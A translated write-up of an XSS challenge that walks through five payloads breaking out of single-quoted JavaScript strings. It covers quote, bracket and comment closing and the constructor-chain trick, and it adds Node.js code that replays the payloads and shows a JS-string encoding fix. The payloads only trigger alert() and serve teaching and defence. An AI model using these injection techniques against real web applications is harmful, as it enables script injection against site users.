SecProject Web AppSec: XSS parsing Article 1

Source: Internet
Author: User

The challenge series has three questions of increasing difficulty. When a variable is reflected inside a single-quoted string in a JavaScript function and the quote is neither escaped nor filtered, the string and then the whole function can be closed, and whatever follows is executed as JavaScript. When the same variable is reflected more than once, however, closing the function cleanly becomes much harder. Here I walk through the answers to this challenge and the XSS tricks they use; after reading them you will see how cunning other people's payloads are.

Normal request:

http://sdl.me/challenge1/xss1/JsChallenge1.asp?input1=111&input2=222&input3=333

Normal source code (each parameter is reflected more than once into the string literals of setid):

<SCRIPT language="Javascript">
function setid(id, name){
   if (document.getElementById('111').value != '222') {
      document.getElementById('111').value= '222';
   }
   if (document.getElementById('111').value != '333') {
      document.getElementById('111').value = '333';
   }
   self.close();
}
//-->
</script>

Payload 1, URL-encoded:

http://sdl.me/challenge1/xss1/JsChallenge1.asp?input1=111&input2=222%27%29a}alert%2811%29;/*&input3=333*/function%20c%28%29{if%280%29{//

Decoded:

input1=111&input2=222')a}alert(11);/*&input3=333*/function c(){if(0){//

Resulting source:

<SCRIPT language="Javascript">
function setid(id, name){
   if (document.getElementById('111').value != '222')a}alert(11);/*') {
      document.getElementById('111').value= '222')a}alert(11);/*';
   }
   if (document.getElementById('111').value != '333*/function c(){if(0){//') {
      document.getElementById('111').value = '333*/function c(){if(0){//';
   }
   self.close();
}
//-->
</script>

Conclusion: when the comment context in JavaScript is under our control, /* */ is a good choice; // only helps when what precedes it is under our control, since it comments out the rest of a line. By closing the single quote, the parentheses () and the braces {} in turn, a controlled variable inside a function can break out of the function declaration and execute code directly.

Payload 2, decoded:

input1=test1&input2=2'){}} try{/*&input3=1*///'}finally{(0)['constructor']['constructor']('\x61lert\x28/superevr/)')()};{{//

Resulting source:

<SCRIPT language="Javascript">
function setid(id, name){
   if (document.getElementById('test1').value != '2'){}} try{/*') {
      document.getElementById('test1').value= '2'){}} try{/*';
   }
   if (document.getElementById('test1').value != '1*///'}finally{(0)['constructor']['constructor']('\x61lert\x28/superevr/)')()};{{//') {
      document.getElementById('test1').value = '1*///'}finally{(0)['constructor']['constructor']('\x61lert\x28/superevr/)')()};{{//';
   }
   self.close();
}
//-->
</script>

Conclusion: (0)['constructor']['constructor']('\x61lert\x28/superevr/)')() executes successfully. (0)['constructor'] is Number, the constructor of the Number object that wraps 0, and (0)['constructor']['constructor'] is therefore the Function object:

(0)['constructor'] === Number                      // true
(0)['constructor']['constructor'] === Function     // true

So the whole expression is equivalent to Function('\x61lert\x28/superevr/)')(), which pops up the dialog.

Payload 3, decoded:

input1=a&input2=');}alert('Peter Jaric');{{/*&input3=*///

Resulting source:

<SCRIPT language="Javascript">
function setid(id, name){
   if (document.getElementById('a').value != '');}alert('Peter Jaric');{{/*') {
      document.getElementById('a').value= '');}alert('Peter Jaric');{{/*';
   }
   if (document.getElementById('a').value != '*///') {
      document.getElementById('a').value = '*///';
   }
   self.close();
}
//-->
</script>

Similar to the previous one: closing the parentheses is the key.

Payload 4, sent with every character of every parameter percent-encoded (*/ becomes %2a%2f, and so on). Decoded:

input3=*/ && a1.replace(/.*/g,alert) || ';}}setid();{{//&input1='),a1="thewildcat",('&input2=yyy'/*

Resulting source:

<SCRIPT language="Javascript">
function setid(id, name){
   if (document.getElementById(''),a1="thewildcat",('').value != 'yyy'/*') {
      document.getElementById(''),a1="thewildcat",('').value= 'yyy'/*';
   }
   if (document.getElementById(''),a1="thewildcat",('').value != '*/ && a1.replace(/.*/g,alert) || ';}}setid();{{//') {
      document.getElementById(''),a1="thewildcat",('').value = '*/ && a1.replace(/.*/g,alert) || ';}}setid();{{//';
   }
   self.close();
}
//-->
</script>

Reading it carefully, you will notice that the author of this payload percent-encodes every character of the parameters, and in that form it executes in Chrome. If the URL is decoded and submitted again, the code does not execute. It is probably a small quirk in how Chrome parses the URL that lets the code run; the decoded form still does not work. I only note it here.

Payload 5, decoded:

input1=one&input2=100'){}}alert(/skeptic_fx/);/*&input3=three';{{//*///

Resulting source:

<SCRIPT language="Javascript">
function setid(id, name){
   if (document.getElementById('one').value != '100'){}}alert(/skeptic_fx/);/*') {
      document.getElementById('one').value= '100'){}}alert(/skeptic_fx/);/*';
   }
   if (document.getElementById('one').value != 'three';{{//*///') {
      document.getElementById('one').value = 'three';{{//*///';
   }
   self.close();
}
//-->
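All five payloads above exploit the same defect: the request parameters are spliced raw into single-quoted JavaScript string literals. The following is an added example, not code from this write-up or from the challenge site. It rebuilds the challenge's script template, loads it with each of the five payloads in a stubbed environment that counts alert() calls, and then shows the fix: before a value is placed inside the string literal, every character outside [A-Za-z0-9] is escaped as \xHH or \uHHHH, so quotes, backslashes, comment tokens, brackets and even </script> become inert text. The payload strings are copied from the listings above; renderSetidScript, encodeForJsString, countAlertsWhenLoaded and demo are names chosen for this example.

```javascript
// Added example (not from the write-up): the challenge's script template,
// the five payloads replayed against it, and the JS-string-context encoding
// that neutralises them. Runs under Node.js; all names here are our own.

// The five inputs shown on this page as (input1, input2, input3), decoded.
const PAYLOADS = [
  ["111", "222')a}alert(11);/*", "333*/function c(){if(0){//"],
  ["test1", "2'){}} try{/*",
   String.raw`1*///'}finally{(0)['constructor']['constructor']('\x61lert\x28/superevr/)')()};{{//`],
  ["a", "');}alert('Peter Jaric');{{/*", "*///"],
  [`'),a1="thewildcat",('`, "yyy'/*", `*/ && a1.replace(/.*/g,alert) || ';}}setid();{{//`],
  ["one", "100'){}}alert(/skeptic_fx/);/*", "three';{{//*///"],
];

// Encode a value for use inside a JavaScript '...' literal: every UTF-16 code
// unit outside [A-Za-z0-9] becomes \xHH (below 0x100) or \uHHHH. This covers
// ' " \ / < > * { } ( ) and the U+2028/U+2029 line terminators.
function encodeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? "\\x" + code.toString(16).padStart(2, "0")
      : "\\u" + code.toString(16).padStart(4, "0");
  });
}

// The challenge page's template. `encode` is the identity by default, which
// reproduces the vulnerable splicing shown above; pass encodeForJsString for the fix.
function renderSetidScript(input1, input2, input3, encode = (s) => s) {
  const [a, b, c] = [input1, input2, input3].map(encode);
  return [
    "function setid(id, name){",
    "   if (document.getElementById('" + a + "').value != '" + b + "') {",
    "      document.getElementById('" + a + "').value= '" + b + "';",
    "   }",
    "   if (document.getElementById('" + a + "').value != '" + c + "') {",
    "      document.getElementById('" + a + "').value = '" + c + "';",
    "   }",
    "   self.close();",
    "}",
  ].join("\n");
}

// Load a rendered script the way a browser would (define it, run top-level
// statements) with stub alert/document/self, and count alert() calls.
// A correct page defines setid and triggers nothing. -1 means the script
// failed to parse or threw.
function countAlertsWhenLoaded(script) {
  let alerts = 0;
  const fakeAlert = () => { alerts += 1; };
  const fakeDocument = { getElementById: () => ({ value: "" }) };
  const fakeSelf = { close() {} };
  const hadAlert = Object.prototype.hasOwnProperty.call(globalThis, "alert");
  const savedAlert = globalThis.alert;
  globalThis.alert = fakeAlert; // code built via Function('...') resolves alert globally
  try {
    new Function("alert", "document", "self", script)(fakeAlert, fakeDocument, fakeSelf);
  } catch (err) {
    return -1;
  } finally {
    if (hadAlert) globalThis.alert = savedAlert; else delete globalThis.alert;
    delete globalThis.a1; // sloppy-mode global created by the fourth payload
  }
  return alerts;
}

// The encoding must be lossless: the page's own JS must read back the same value.
function roundTrips(value) {
  return new Function("return '" + encodeForJsString(value) + "';")() === value;
}

// Raw splice vs. encoded splice for every payload.
function demo() {
  return PAYLOADS.map(([a, b, c]) => ({
    raw: countAlertsWhenLoaded(renderSetidScript(a, b, c)),
    encoded: countAlertsWhenLoaded(renderSetidScript(a, b, c, encodeForJsString)),
    roundTrips: [a, b, c].every(roundTrips),
  }));
}

console.log(JSON.stringify(demo(), null, 2));
```

Every payload fires at least one alert when spliced raw and none once encoded, and each value still reads back unchanged inside the page's script. Escaping to \xHH rather than backslash-escaping only the quote is deliberate: a quote-only escape leaves </script> and the comment tokens intact, and the page's own payloads show how much can be done with those alone.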

 

Here we have to mention the //*/// trick. If a /* is open before it, the */ inside the sequence closes that block comment, and the // that follows comments out the rest of the line. If there is no /* to pair with, the leading // is a line comment that swallows the rest of the line, including the */, so no unmatched comment terminator is left behind. This comment sequence is very handy.

Source & reference:
http://soroush.secproject.com/blog/2012/04/secproject-web-appsec-challenge-series-1/
http://soroush.secproject.com/blog/2012/06/challenge-series-1-result-and-conclusion/
http://soroush.secproject.com/blog/projects/hall-of-fame-challenge-series-1/
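To see the two states of the //*/// sequence concretely, here is an added example that is not part of the write-up: a minimal string-aware scanner over JavaScript source that drops comments, with the tail of the fifth payload's reflected line run through it once with a /* comment already open and once without. stripComments, TAIL and demoBothStates are names chosen for this example. The scanner does not recognise regex literals, which is enough for this demonstration.

```javascript
// Added example (not from the write-up): a small comment scanner used to show
// why  //*///  discards the rest of its line whether or not /* is open.
// It tracks string literals so that comment markers inside them are ignored;
// regex literals are not handled.

// Remove /* */ and // comments, keeping string literals and newlines intact.
function stripComments(src) {
  let out = "";
  let state = "code"; // "code" | "block" | "line" | "sq" | "dq"
  for (let i = 0; i < src.length; i++) {
    const ch = src[i];
    const next = src[i + 1];
    switch (state) {
      case "block": // inside /* ... */ : only */ gets us out
        if (ch === "*" && next === "/") { state = "code"; i++; }
        else if (ch === "\n") out += ch;
        break;
      case "line": // inside // ... : only a newline gets us out
        if (ch === "\n") { state = "code"; out += ch; }
        break;
      case "sq":
      case "dq": // inside a string literal: comment markers are plain text
        out += ch;
        if (ch === "\\" && next !== undefined) { out += next; i++; }
        else if (ch === (state === "sq" ? "'" : '"')) state = "code";
        break;
      default: // ordinary code
        if (ch === "/" && next === "*") { state = "block"; i++; }
        else if (ch === "/" && next === "/") { state = "line"; i++; }
        else {
          if (ch === "'") state = "sq";
          else if (ch === '"') state = "dq";
          out += ch;
        }
    }
  }
  return out;
}

// The reflected value of input3 from the fifth payload, as it appears on the
// page's `!=` line together with the template's closing  ') {
const TAIL = "'three';{{//*///') {";

// Run that line through both lexer states it is reflected in.
function demoBothStates() {
  // State A (the `!=` line): the /* opened by input2 on an earlier line is still open.
  const openComment = "x = 1; /* still open\n" + TAIL + "\nok = true;";
  // State B (the `=` line): no comment is open; the value sits in plain code.
  const noComment = "x = 1;\nv = " + TAIL + "\nok = true;";
  return {
    openComment: stripComments(openComment),
    noComment: stripComments(noComment),
  };
}

console.log(demoBothStates());
```

In state A the whole line disappears with the block comment, leaving only the newline; in state B the line survives up to the {{ and everything from // onward is dropped. In neither case does a stray */ reach the parser, and the {{ left in state B is exactly what the template's two remaining } lines close, which is why the fifth payload parses cleanly.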
